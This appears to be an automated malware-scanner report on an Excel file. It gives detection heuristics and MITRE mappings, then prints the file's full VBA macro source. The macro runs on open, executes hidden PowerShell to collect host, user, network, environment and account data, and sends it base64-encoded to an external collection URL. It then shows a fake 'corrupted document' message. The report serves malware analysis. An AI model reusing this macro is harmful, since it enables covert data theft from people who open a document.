MALICIOUS
394
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This Excel document contains VBA macros that are designed to execute PowerShell commands. The macros attempt to gather basic system information, IP configuration, and environment variables. The collected data is then sent to the URL http://osiris.compass-security.com/phishing/collect.php. The presence of AutoOpen and Document_Open macros indicates it's likely delivered as a spearphishing attachment.
Heuristics 13
-
ClamAV: Doc.Dropper.Agent-6418305-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6418305-0
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
tmpOutFile = createTempFile() Set wsh = CreateObject("WScript.Shell") pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34) -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
''' ------------------------------- ''' myCmd = "<powershell command>" ''' output = RunPowershellCmd(myCmd) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set HttpReq = CreateObject("MSXML2.XMLHTTP") ' change path to collection script here -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Public Sub AutoOpen() submit_mode = "auto" -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() submit_mode = "auto" -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Public Sub Auto_Open() submit_mode = "auto" -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
hostname = Environ("computername") username = Environ("username") -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://osiris.compass-security.com/phishing/collect.php In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7832 bytes |
SHA-256: b369da19614fd601c7ffceafd35b9405e319d0f6a6e9de2a2676c93b48b6494d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' TODO
' Change the hardcoded fileID in the Exploit() function
' Adjust the executed PS commands in the Exploit() function as necessary
' Adjust the URL of the collection script in the Request() function
' Adjust the language of the displayed messages
Public submit_mode As String
Public runID As String
Public fileID As String
Private Sub CommandButton1_Click()
submit_mode = "click"
Call Exploit
End Sub
Public Sub Document_Open()
submit_mode = "auto"
Call Exploit
End Sub
Public Sub Auto_Open()
submit_mode = "auto"
Call Exploit
End Sub
Public Sub AutoOpen()
submit_mode = "auto"
Call Exploit
End Sub
Public Sub AutoExec()
submit_mode = "auto"
Call Exploit
End Sub
Function Exploit()
' executed attacks are defined here. add more commands using the template below
''' template for PS command
''' -------------------------------
''' myCmd = "<powershell command>"
''' output = RunPowershellCmd(myCmd)
''' Call Request(output, "<label>")
''' -------------------------------
On Error GoTo Err2:
Dim myCmd As String
Dim output As String
' generate a random ID to identify connected requests
runID = RandomString(32)
' hardcoded ID to identify source document of requests
fileID = "contentfiltercheck"
' Basic information gathering without PowerShell
Call Request(BasicInfo(), "BasicInfo")
' Get ip configuration with PS
myCmd = "Get-NetIPConfiguration"
output = RunPowershellCmd(myCmd)
Call Request(output, "ipconfig")
' Get environment variables with PS
myCmd = "Get-ChildItem Env:"
output = RunPowershellCmd(myCmd)
Call Request(output, "env_vars")
' Get local user accounts with PS
myCmd = "Get-WmiObject -Class Win32_UserAccount -Filter 'LocalAccount=True' | Select PSComputername, Name, Status, Disabled, AccountType, Lockout, PasswordRequired, PasswordChangeable, SID "
output = RunPowershellCmd(myCmd)
Call Request(output, "local_users")
' Get connected volumes/shares with PS
myCmd = "Get-WmiObject -class win32_logicaldisk"
output = RunPowershellCmd(myCmd)
Call Request(output, "local_volumes")
' Show corruption message and close document
MsgBox "The document is corrupted and cannot be opened.", vbOKOnly
ActiveDocument.Close SaveChanges:=wdDoNotSaveChanges
Exit Function
Err2:
MsgBox "An unknown error occurred.", vbCritical, "Unknown error"
End Function
Function Request(data As String, Optional label As String = "n/a")
Dim outBytes() As Byte
Dim encOutput As String
On Error GoTo Err1:
' base64 encode data to be transmitted
outBytes = data
encOutput = Replace(EncodeBase64(outBytes), Chr(10), "")
Dim HttpReq As Object
Set HttpReq = CreateObject("MSXML2.XMLHTTP")
' change path to collection script here
HttpReq.Open "POST", "http://osiris.compass-security.com/phishing/collect.php", False
HttpReq.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
HttpReq.send "fileID=" & fileID & "&runID=" & runID & "&data=" & label & ":" & encOutput & "&mode=" & submit_mode
RequestWin = HttpReq.responseText
Exit Function
Err1:
MsgBox "An unknown error occurred.", vbCritical, "Unknown error"
End Function
Public Function createTempFile() As String
' create a temporary file to store command output
Dim tmpFolder, tmpName, tmpFile, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set tmpFolder = fso.GetSpecialFolder(2)
tmpName = fso.GetTempName
Set tmpFile = tmpFolder.CreateTextFile(tmpName)
tmpFile.Close
createTempFile = tmpFolder & "\" & tmpName
End Function
Public Function getOutput(ByVal tmpOutFile As String) As String
' retrieve command output from temporary file
Dim tmpFile, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set tmpFile = fso.OpenTextFile(tmpOutFile, 1, False, -1)
getOutput = tmpFile.readall
tmpFile.Close
End Function
Public Function BasicInfo() As String
' collect basic information without PS, should work on all systems
Dim hostname As String
Dim username As String
hostname = Environ("computername")
username = Environ("username")
BasicInfo = "pc:" & hostname & ";user:" & username
BasicInfo = CStr(StrConv(CStr(BasicInfo), vbFromUnicode))
End Function
Public Function RunPowershellCmd(myCmd As String) As String
' execute given powershell command, store output in a temporary file and return output from there
Dim wsh As Object
Dim ret
Dim strOutput, tmpOutFile, pscmd As String
tmpOutFile = createTempFile()
Set wsh = CreateObject("WScript.Shell")
pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)
ret = wsh.Run(pscmd, 0, True)
strOutput = getOutput(tmpOutFile)
RunPowershellCmd = strOutput
End Function
Public Function BASE64SHA1(ByVal sTextToHash As String)
' base64 encode data and then hash it with sha1
Dim asc As Object
Dim enc As Object
Dim TextToHash() As Byte
Dim SharedSecretKey() As Byte
Dim bytes() As Byte
Const cutoff As Integer = 5
Set asc = CreateObject("System.Text.UTF8Encoding")
Set enc = CreateObject("System.Security.Cryptography.HMACSHA1")
TextToHash = asc.GetBytes_4(sTextToHash)
SharedSecretKey = asc.GetBytes_4(sTextToHash)
enc.Key = SharedSecretKey
bytes = enc.ComputeHash_2((TextToHash))
BASE64SHA1 = EncodeBase64(bytes)
'BASE64SHA1 = Left(BASE64SHA1, cutoff)
Set asc = Nothing
Set enc = Nothing
End Function
Public Function EncodeBase64(ByRef arrData() As Byte) As String
' base64 encode data
Dim objXML As Object
Dim objNode As Object
Set objXML = CreateObject("MSXML2.DOMDocument")
Set objNode = objXML.createElement("b64")
objNode.DataType = "bin.base64"
objNode.nodeTypedValue = arrData
EncodeBase64 = objNode.Text
Set objNode = Nothing
Set objXML = Nothing
End Function
Public Function decodeBase64(ByVal strData As String) As Byte()
' base64 decode data
Dim objXML As Object
Dim objNode As Object
Set objXML = CreateObject("MSXML2.DOMDocument")
Set objNode = objXML.createElement("b64")
objNode.DataType = "bin.base64"
objNode.Text = strData
decodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Public Function RandomString(l As Integer) As String
' generate a random string (lowercase/uppercase/digits) of length l
Randomize
Dim rndStr As String
rndStr = "abcdefghijklmnopqrstuvwxyz"
rndStr = rndStr & UCase(rndStr) & "0123456789"
Dim i As Long
For i = 1 To l
RandomString = RandomString & Mid$(rndStr, Int(Rnd() * Len(rndStr) + 1), 1)
Next
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.